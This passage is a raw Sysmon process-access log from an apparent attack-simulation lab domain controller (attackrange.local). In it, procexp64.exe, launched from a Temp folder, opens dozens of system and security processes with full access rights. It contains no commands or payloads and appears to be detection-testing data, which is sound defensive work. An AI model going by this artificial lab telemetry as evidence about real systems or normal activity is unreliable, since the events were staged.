15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792531Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792530Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792529Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792528Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792527Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792526Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792525Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792524Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792523Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792522Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792521Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792520Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792519Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792518Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792517Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792516Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792515Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792514Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792513Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792512Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792511Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792510Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792509Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792508Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792507Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792506Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792505Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792504Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792503Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792502Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792501Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792500Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792499Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792498Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792497Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792496Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792495Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program 